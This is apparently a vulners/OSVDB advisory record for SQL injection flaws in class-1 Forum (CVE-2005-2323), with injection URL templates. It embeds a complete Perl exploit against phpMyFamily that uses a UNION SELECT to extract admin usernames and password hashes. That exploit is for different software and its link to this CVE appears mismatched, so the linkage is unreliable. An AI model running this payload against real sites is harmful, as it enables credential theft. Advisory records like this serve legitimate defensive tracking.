class-1 Forum users.php viewuser_id Variable SQL Injection
2005-07-14T12:10:42
ID: OSVDB:17922
Type: osvdb
Reporter: Lostmon Lords (Lostmon@gmail.com)
Modified: 2005-07-14T12:10:42
Description
Vulnerability Description
class-1 Forum contains a flaw that may allow a remote attacker to carry out an SQL injection attack. The issue is due to the 'users.php' script not properly sanitizing user-supplied input to the 'viewuser_id' variable. This may allow a remote attacker to inject or manipulate SQL queries in the backend database.
Solution Description
Currently, there are no known upgrades, patches, or workarounds available to correct this issue.
{"type": "osvdb", "published": "2005-07-14T12:10:42", "href": "https://vulners.com/osvdb/OSVDB:17922", "bulletinFamily": "software", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/", "score": 7.5}, "viewCount": 6, "edition": 1, "reporter": "Lostmon Lords(Lostmon@gmail.com)", "title": "class-1 Forum users.php viewuser_id Variable SQL Injection", "affectedSoftware": [{"operator": "eq", "version": "0.24.4", "name": "class-1 Forum"}, {"operator": "eq", "version": "0.23.2", "name": "class-1 Forum"}], "enchantments": {"score": {"value": 7.2, "vector": "NONE", "modified": "2017-04-28T13:20:14", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2005-2323"]}, {"type": "exploitdb", "idList": ["EDB-ID:1208"]}, {"type": "osvdb", "idList": ["OSVDB:17921", "OSVDB:17923"]}], "modified": "2017-04-28T13:20:14", "rev": 2}, "vulnersScore": 7.2}, "references": [], "id": "OSVDB:17922", "lastseen": "2017-04-28T13:20:14", "cvelist": ["CVE-2005-2323"], "modified": "2005-07-14T12:10:42", "description": "## Vulnerability Description\nclass-1 Forum contains a flaw that may allow a remote attacker to carry out an SQL injection attack. The issue is due to the 'users.php' script not properly sanitizing user-supplied input to the 'viewuser_id' variable. This may allow a remote attacker to inject or manipulate SQL queries in the backend database.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nclass-1 Forum contains a flaw that may allow a remote attacker to carry out an SQL injection attack. The issue is due to the 'users.php' script not properly sanitizing user-supplied input to the 'viewuser_id' variable. 
This may allow a remote attacker to inject or manipulate SQL queries in the backend database.\n## Manual Testing Notes\nhttp://[target]/forum/users.php?mode=viewprofile&viewuser_id=[SQL-Injection]\n## References:\nVendor URL: http://www.class1web.co.uk/download_forum.php\nSecurity Tracker: 1014485\nSecurity Tracker: 1014486\n[Secunia Advisory ID:16078](https://secuniaresearch.flexerasoftware.com/advisories/16078/)\n[Related OSVDB ID: 17920](https://vulners.com/osvdb/OSVDB:17920)\n[Related OSVDB ID: 17923](https://vulners.com/osvdb/OSVDB:17923)\n[Related OSVDB ID: 17921](https://vulners.com/osvdb/OSVDB:17921)\nOther Advisory URL: http://lostmon.blogspot.com/2005/07/class-1-forum-software-cross-site.html\nISS X-Force ID: 21470\n[CVE-2005-2323](https://vulners.com/cve/CVE-2005-2323)\nBugtraq ID: 14261\n"}
{"cve": [{"lastseen": "2020-10-03T11:34:55", "description": "Multiple SQL injection vulnerabilities in Class-1 Forum 0.24.4 and 0.23.2, and Clever Copy with forums installed, allow remote attackers to modify SQL statements via the (1) id parameter to viewattach.php, (2) viewuser_id parameter to users.php, or the (3) id or (4) forum parameter to viewforum.php.", "edition": 3, "cvss3": {}, "published": "2005-07-19T04:00:00", "title": "CVE-2005-2323", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-2323"], "modified": "2008-09-05T20:51:00", "cpe": ["cpe:/a:clever_copy:clever_copy:*", "cpe:/a:class-1:class-1_forum:0.24.4", "cpe:/a:class-1:class-1_forum:0.23.2"], "id": "CVE-2005-2323", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2323", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:class-1:class-1_forum:0.24.4:*:*:*:*:*:*:*", "cpe:2.3:a:clever_copy:clever_copy:*:*:*:*:*:*:*:*", "cpe:2.3:a:class-1:class-1_forum:0.23.2:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:14", "bulletinFamily": "software", "cvelist": ["CVE-2005-2323"], "edition": 1, "description": "## Vulnerability Description\nclass-1 Forum contains a flaw that may allow a remote attacker to carry out an SQL injection attack. The issue is due to the 'viewattach.php' script not properly sanitizing user-supplied input to the 'id' variable. 
This may allow a remote attacker to inject or manipulate SQL queries in the backend database.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nclass-1 Forum contains a flaw that may allow a remote attacker to carry out an SQL injection attack. The issue is due to the 'viewattach.php' script not properly sanitizing user-supplied input to the 'id' variable. This may allow a remote attacker to inject or manipulate SQL queries in the backend database.\n## Manual Testing Notes\nhttp://[target]/forum/viewattach.php?id=[SQL-Injection]\n## References:\nVendor URL: http://www.class1web.co.uk/download_forum.php\nSecurity Tracker: 1014485\nSecurity Tracker: 1014486\n[Secunia Advisory ID:16078](https://secuniaresearch.flexerasoftware.com/advisories/16078/)\n[Related OSVDB ID: 17920](https://vulners.com/osvdb/OSVDB:17920)\n[Related OSVDB ID: 17923](https://vulners.com/osvdb/OSVDB:17923)\n[Related OSVDB ID: 17922](https://vulners.com/osvdb/OSVDB:17922)\nOther Advisory URL: http://lostmon.blogspot.com/2005/07/class-1-forum-software-cross-site.html\nISS X-Force ID: 21470\n[CVE-2005-2323](https://vulners.com/cve/CVE-2005-2323)\nBugtraq ID: 14261\n", "modified": "2005-07-14T12:10:42", "published": "2005-07-14T12:10:42", "href": "https://vulners.com/osvdb/OSVDB:17921", "id": "OSVDB:17921", "type": "osvdb", "title": "class-1 Forum viewattach.php id Variable SQL Injection", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:14", "bulletinFamily": "software", "cvelist": ["CVE-2005-2323"], "edition": 1, "description": "## Vulnerability Description\nclass-1 Forum contains a flaw that may allow a remote attacker to carry out an SQL injection attack. The issue is due to the 'viewforum.php' script not properly sanitizing user-supplied input to the 'id' and 'forum' variable. 
This may allow a remote attacker to inject or manipulate SQL queries in the backend database.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nclass-1 Forum contains a flaw that may allow a remote attacker to carry out an SQL injection attack. The issue is due to the 'viewforum.php' script not properly sanitizing user-supplied input to the 'id' and 'forum' variable. This may allow a remote attacker to inject or manipulate SQL queries in the backend database.\n## Manual Testing Notes\nhttp://[target]/forum/viewforum.php?mode=view&id=[SQL-Injection]\nhttp://[target]/forum/viewforum.php?forum=[SQL-Injection]\n## References:\nVendor URL: http://www.class1web.co.uk/download_forum.php\nSecurity Tracker: 1014485\nSecurity Tracker: 1014486\n[Secunia Advisory ID:16078](https://secuniaresearch.flexerasoftware.com/advisories/16078/)\n[Related OSVDB ID: 17920](https://vulners.com/osvdb/OSVDB:17920)\n[Related OSVDB ID: 17921](https://vulners.com/osvdb/OSVDB:17921)\n[Related OSVDB ID: 17922](https://vulners.com/osvdb/OSVDB:17922)\nOther Advisory URL: http://lostmon.blogspot.com/2005/07/class-1-forum-software-cross-site.html\nISS X-Force ID: 21470\n[CVE-2005-2323](https://vulners.com/cve/CVE-2005-2323)\nBugtraq ID: 14261\n", "modified": "2005-07-14T12:10:42", "published": "2005-07-14T12:10:42", "href": "https://vulners.com/osvdb/OSVDB:17923", "id": "OSVDB:17923", "type": "osvdb", "title": "class-1 Forum viewforum.php Multiple Variable SQL Injection", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-01-31T13:46:08", "description": "phpMyFamily <= 1.4.0 SQL Injection Exploit. CVE-2005-2323. 
Webapps exploit for php platform", "published": "2005-03-27T00:00:00", "type": "exploitdb", "title": "phpMyFamily <= 1.4.0 - SQL Injection Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-2323"], "modified": "2005-03-27T00:00:00", "id": "EDB-ID:1208", "href": "https://www.exploit-db.com/exploits/1208/", "sourceData": "#!/usr/bin/perl -w\r\n# phpMyFamily Exploit injection\r\n# ==============================\r\n$banner = \"phpMyFamily Exploit injection \\n\\n==============================\r\n\\n\\nINFGPG-Hacking&Security Research\";\r\n# \r\n# Greats: AresU (1st IndoSec Team),ADZ Security Team (has discovered bugs)\r\n# Info: 98.to/infamous\r\n\r\nuse IO::Socket;\r\nif ($#ARGV<0){\r\nprint \"\\n$banner\";\r\nprint \"\\n\\n Usage: perl phpMyFamily.pl [host] [path] \\n\\n\";\r\nexit;}\r\n\r\n$gen=\"%20UNION%20SELECT%20NULL,password,NULL,username,NULL,NULL,NULL,NULL,NUL\r\nL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20family_users%20%20WH\r\nERE%20admin='Y'%20LIMIT%201,1\"; # This selects first admin with login &\r\npassword hash :)\r\n\r\n$serius=\"GET $ARGV[1]/$ARGV[2]/people.php?person=00002'$gen HTTP/1.0\\r\\n\\r\\n\";\r\n$muka=IO::Socket::INET->new(Proto=>\"tcp\",PeerAddr=>\"$ARGV[0]\",PeerPort=>\"80\")\r\nor die \"$ARGV[0]Connection Failed !!\\n\\n\";\r\n\r\n$muka -> autoflush(1);\r\nprint $muka \"$serius\"; \r\nprint \"[*]Sending exploit DONE \\n\\n\"; \r\nsleep(7);\r\nclose($muka);\n\n# milw0rm.com [2005-03-27]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/1208/"}]}